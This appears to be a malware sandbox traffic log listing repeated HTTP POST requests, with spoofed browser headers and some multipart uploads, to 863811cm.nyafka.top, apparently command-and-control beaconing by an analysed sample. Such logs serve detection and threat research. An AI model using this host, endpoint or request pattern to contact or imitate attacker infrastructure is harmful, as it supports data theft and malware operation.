Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ddn8qPGODcLu2yd5tsptkWBxsiMqNsep61User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----NHB4gCvyF09nvGpdQX0ryrYNSBUL2ro1PGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3182Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Uf0Duz5iqJeMwKOEA54PhwnBHpLhjFY1V4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1992Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ZOObBXvS4h1tKQkstlqP7QLI7LH1b425w1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
